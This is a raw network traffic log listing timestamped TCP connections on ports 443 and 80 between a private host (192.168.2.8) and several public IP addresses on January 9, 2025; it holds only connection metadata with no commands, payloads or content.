Jan 9, 2025 14:41:11.629388094 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.634337902 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.672303915 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.672364950 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.672439098 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.677388906 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.678025961 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.682874918 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.713752031 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.718046904 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.727166891 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.727205992 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.727281094 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.730875969 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.730940104 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.735824108 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.779026985 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.779046059 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.779109955 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.783093929 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.785132885 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.789988041 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.815923929 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.819202900 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.831752062 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.831765890 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.831828117 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.836589098 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.837177992 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.842084885 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.882105112 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.882117033 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.882158041 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.882170916 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.886070967 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.886215925 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.891833067 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.920391083 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.924612999 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.933382034 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.933401108 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.933492899 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.935734987 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.970765114 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.973602057 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.986860037 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.986875057 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.986896992 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.986924887 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:11.986974955 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.987024069 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.990663052 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.991702080 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:11.997560024 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.021915913 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.021929979 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.021950006 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.021995068 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:12.025762081 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:12.067393064 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.067461014 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.067838907 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:12.071330070 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:12.075639963 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.079145908 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:12.085503101 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.090790987 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.090818882 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.090899944 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:12.094312906 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:12.095354080 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:12.102485895 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.164633036 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.168160915 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:12.174175024 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.177160978 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:12.179739952 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.196373940 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.196392059 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.196690083 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:12.268178940 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.285621881 CET	443	49705	13.107.246.45	192.168.2.8
Jan 9, 2025 14:41:12.285741091 CET	49705	443	192.168.2.8	13.107.246.45
Jan 9, 2025 14:41:15.017081022 CET	49673	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:15.360800982 CET	49672	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:17.004942894 CET	443	49703	23.206.229.226	192.168.2.8
Jan 9, 2025 14:41:17.005136967 CET	49703	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:17.782640934 CET	49676	443	192.168.2.8	52.182.143.211
Jan 9, 2025 14:41:20.407573938 CET	49677	80	192.168.2.8	192.229.211.108
Jan 9, 2025 14:41:26.979662895 CET	49703	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:26.980074883 CET	49703	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:26.982238054 CET	49708	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:26.982275009 CET	443	49708	23.206.229.226	192.168.2.8
Jan 9, 2025 14:41:26.982346058 CET	49708	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:26.983598948 CET	49708	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:26.983608007 CET	443	49708	23.206.229.226	192.168.2.8
Jan 9, 2025 14:41:26.984467983 CET	443	49703	23.206.229.226	192.168.2.8
Jan 9, 2025 14:41:26.984843016 CET	443	49703	23.206.229.226	192.168.2.8
Jan 9, 2025 14:41:27.567058086 CET	443	49708	23.206.229.226	192.168.2.8
Jan 9, 2025 14:41:27.567150116 CET	49708	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:46.719784975 CET	443	49708	23.206.229.226	192.168.2.8
Jan 9, 2025 14:41:46.719863892 CET	49708	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:58.362747908 CET	49708	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:58.362776041 CET	443	49708	23.206.229.226	192.168.2.8
Jan 9, 2025 14:41:58.363200903 CET	49712	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:58.363253117 CET	443	49712	23.206.229.226	192.168.2.8
Jan 9, 2025 14:41:58.363332033 CET	49712	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:58.363954067 CET	49712	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:58.364003897 CET	443	49712	23.206.229.226	192.168.2.8
Jan 9, 2025 14:41:58.364046097 CET	49712	443	192.168.2.8	23.206.229.226
Jan 9, 2025 14:41:59.172214985 CET	49704	80	192.168.2.8	199.232.214.172
Jan 9, 2025 14:41:59.177217960 CET	80	49704	199.232.214.172	192.168.2.8
Jan 9, 2025 14:41:59.177297115 CET	49704	80	192.168.2.8	199.232.214.172
Jan 9, 2025 14:42:19.783837080 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:19.783883095 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:19.783977985 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:19.793478012 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:19.793498039 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.263387918 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.263463974 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.265249968 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.265259981 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.265518904 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.313978910 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.328946114 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.328995943 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.329010010 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.861387014 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.861465931 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.861502886 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.861531019 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.861562967 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.861613989 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.861763000 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.862034082 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.862068892 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.862078905 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.862087965 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.862174988 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.862562895 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.866054058 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.866091967 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.866106987 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.866113901 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.866168022 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.949381113 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.950737953 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.950787067 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.950786114 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.950825930 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.950870037 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.950876951 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.950930119 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.950973034 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.950979948 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.951000929 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.951035976 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.951190948 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.951277971 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.951311111 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.951344013 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.951349974 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.951391935 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.951392889 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.951404095 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.951471090 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.951498032 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.952253103 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.952294111 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.952322960 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.952342987 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.952369928 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.952431917 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.952485085 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.952507973 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.952533007 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:20.952545881 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:20.952610970 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.034533978 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.034634113 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.034677029 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.034698963 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.040612936 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.040652990 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.040654898 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.040668011 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.040709019 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.040731907 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.040785074 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.040826082 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.040832043 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.040865898 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.041047096 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.041090012 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.041095018 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.041100979 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.041124105 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.041204929 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.041249037 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.042082071 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.042097092 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.042107105 CET	49714	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.042112112 CET	443	49714	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.103962898 CET	49715	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.104002953 CET	443	49715	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.104084969 CET	49715	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.104460001 CET	49715	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.104475975 CET	443	49715	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.591691017 CET	443	49715	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.591834068 CET	49715	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.612380981 CET	49715	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.612404108 CET	443	49715	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.612788916 CET	443	49715	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.624983072 CET	49715	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.625030994 CET	49715	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:21.625037909 CET	443	49715	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.909223080 CET	443	49715	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.909352064 CET	443	49715	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:21.909456015 CET	49715	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:22.007361889 CET	49715	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:22.007391930 CET	443	49715	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:22.007410049 CET	49715	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:22.007416964 CET	443	49715	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:22.224416018 CET	49716	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:22.224438906 CET	443	49716	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:22.224540949 CET	49716	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:22.224935055 CET	49716	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:22.224947929 CET	443	49716	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:22.688991070 CET	443	49716	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:22.689186096 CET	49716	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:22.693856001 CET	49716	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:22.693887949 CET	443	49716	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:22.694175005 CET	443	49716	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:22.695388079 CET	49716	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:22.695453882 CET	49716	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:22.695468903 CET	443	49716	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:23.016026974 CET	443	49716	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:23.016098976 CET	443	49716	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:23.016278982 CET	49716	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:23.016377926 CET	49716	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:23.016377926 CET	49716	443	192.168.2.8	172.67.174.91
Jan 9, 2025 14:42:23.016422987 CET	443	49716	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:23.016454935 CET	443	49716	172.67.174.91	192.168.2.8
Jan 9, 2025 14:42:32.733562946 CET	49731	443	192.168.2.8	2.23.227.202
Jan 9, 2025 14:42:32.733598948 CET	443	49731	2.23.227.202	192.168.2.8
Jan 9, 2025 14:42:32.733663082 CET	49731	443	192.168.2.8	2.23.227.202
Jan 9, 2025 14:42:32.741758108 CET	49731	443	192.168.2.8	2.23.227.202
Jan 9, 2025 14:42:32.741770983 CET	443	49731	2.23.227.202	192.168.2.8
Jan 9, 2025 14:42:32.755214930 CET	49740	443	192.168.2.8	18.244.18.122
Jan 9, 2025 14:42:32.755238056 CET	443	49740	18.244.18.122	192.168.2.8
Jan 9, 2025 14:42:32.755326033 CET	49740	443	192.168.2.8	18.244.18.122
Jan 9, 2025 14:42:32.755470991 CET	49740	443	192.168.2.8	18.244.18.122
Jan 9, 2025 14:42:32.755480051 CET	443	49740	18.244.18.122	192.168.2.8
Jan 9, 2025 14:42:33.373930931 CET	443	49731	2.23.227.202	192.168.2.8
Jan 9, 2025 14:42:33.450261116 CET	49731	443	192.168.2.8	2.23.227.202
Jan 9, 2025 14:42:33.450268030 CET	443	49731	2.23.227.202	192.168.2.8
Jan 9, 2025 14:42:33.451353073 CET	443	49731	2.23.227.202	192.168.2.8
Jan 9, 2025 14:42:33.451370001 CET	443	49731	2.23.227.202	192.168.2.8
Jan 9, 2025 14:42:33.451409101 CET	49731	443	192.168.2.8	2.23.227.202
Jan 9, 2025 14:42:33.483716011 CET	49731	443	192.168.2.8	2.23.227.202
Jan 9, 2025 14:42:33.483851910 CET	443	49731	2.23.227.202	192.168.2.8
Jan 9, 2025 14:42:33.495223999 CET	443	49740	18.244.18.122	192.168.2.8
Jan 9, 2025 14:42:33.531459093 CET	49740	443	192.168.2.8	18.244.18.122
Jan 9, 2025 14:42:33.531469107 CET	443	49740	18.244.18.122	192.168.2.8
Jan 9, 2025 14:42:33.532686949 CET	443	49740	18.244.18.122	192.168.2.8
Jan 9, 2025 14:42:33.532767057 CET	49740	443	192.168.2.8	18.244.18.122
Jan 9, 2025 14:42:33.534404993 CET	49740	443	192.168.2.8	18.244.18.122
Jan 9, 2025 14:42:33.534471035 CET	443	49740	18.244.18.122	192.168.2.8
Jan 9, 2025 14:42:33.662554026 CET	49731	443	192.168.2.8	2.23.227.202
Jan 9, 2025 14:42:33.662565947 CET	443	49731	2.23.227.202	192.168.2.8
Jan 9, 2025 14:42:33.662600994 CET	49740	443	192.168.2.8	18.244.18.122
Jan 9, 2025 14:42:33.662607908 CET	443	49740	18.244.18.122	192.168.2.8
Jan 9, 2025 14:42:33.806551933 CET	49731	443	192.168.2.8	2.23.227.202
Jan 9, 2025 14:42:33.806580067 CET	49740	443	192.168.2.8	18.244.18.122
Jan 9, 2025 14:42:34.650063038 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:34.650127888 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:34.650281906 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:34.653120041 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:34.653137922 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:34.740643024 CET	49748	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:34.740652084 CET	443	49748	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:34.740710020 CET	49748	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:34.740921974 CET	49748	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:34.740931034 CET	443	49748	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:34.741369963 CET	49749	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:34.741416931 CET	443	49749	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:34.741482973 CET	49749	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:34.741775990 CET	49749	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:34.741807938 CET	443	49749	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:34.755443096 CET	49750	443	192.168.2.8	162.159.61.3
Jan 9, 2025 14:42:34.755491018 CET	443	49750	162.159.61.3	192.168.2.8
Jan 9, 2025 14:42:34.755554914 CET	49750	443	192.168.2.8	162.159.61.3
Jan 9, 2025 14:42:34.756145000 CET	49750	443	192.168.2.8	162.159.61.3
Jan 9, 2025 14:42:34.756180048 CET	443	49750	162.159.61.3	192.168.2.8
Jan 9, 2025 14:42:35.198174953 CET	443	49748	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.199556112 CET	443	49749	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.213184118 CET	49749	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.213191032 CET	443	49749	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.213449955 CET	49748	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.213460922 CET	443	49748	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.214385033 CET	443	49749	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.214433908 CET	49749	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.214551926 CET	443	49748	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.214612007 CET	49748	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.218605995 CET	49749	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.218733072 CET	443	49749	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.219053984 CET	49749	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.219059944 CET	443	49749	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.220233917 CET	49748	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.220298052 CET	49748	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.220308065 CET	443	49748	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.246280909 CET	443	49750	162.159.61.3	192.168.2.8
Jan 9, 2025 14:42:35.253565073 CET	49750	443	192.168.2.8	162.159.61.3
Jan 9, 2025 14:42:35.253607035 CET	443	49750	162.159.61.3	192.168.2.8
Jan 9, 2025 14:42:35.254762888 CET	443	49750	162.159.61.3	192.168.2.8
Jan 9, 2025 14:42:35.254843950 CET	49750	443	192.168.2.8	162.159.61.3
Jan 9, 2025 14:42:35.270633936 CET	49750	443	192.168.2.8	162.159.61.3
Jan 9, 2025 14:42:35.270733118 CET	443	49750	162.159.61.3	192.168.2.8
Jan 9, 2025 14:42:35.271370888 CET	49750	443	192.168.2.8	162.159.61.3
Jan 9, 2025 14:42:35.271414995 CET	443	49750	162.159.61.3	192.168.2.8
Jan 9, 2025 14:42:35.279757023 CET	49749	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.310462952 CET	49748	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.310471058 CET	443	49748	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.318722010 CET	443	49749	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.318806887 CET	443	49749	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.318852901 CET	49749	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.331834078 CET	443	49748	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.332931995 CET	49748	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.373755932 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.381817102 CET	49748	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.381834984 CET	443	49748	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.382193089 CET	49749	443	192.168.2.8	172.64.41.3
Jan 9, 2025 14:42:35.382215023 CET	443	49749	172.64.41.3	192.168.2.8
Jan 9, 2025 14:42:35.382536888 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.382549047 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.383011103 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.383027077 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.383296967 CET	49746	443	192.168.2.8	172.217.18.97
Jan 9, 2025 14:42:35.383304119 CET	443	49746	172.217.18.97	192.168.2.8
Jan 9, 2025 14:42:35.383414030 CET	49746	443	192.168.2.8	172.217.18.97
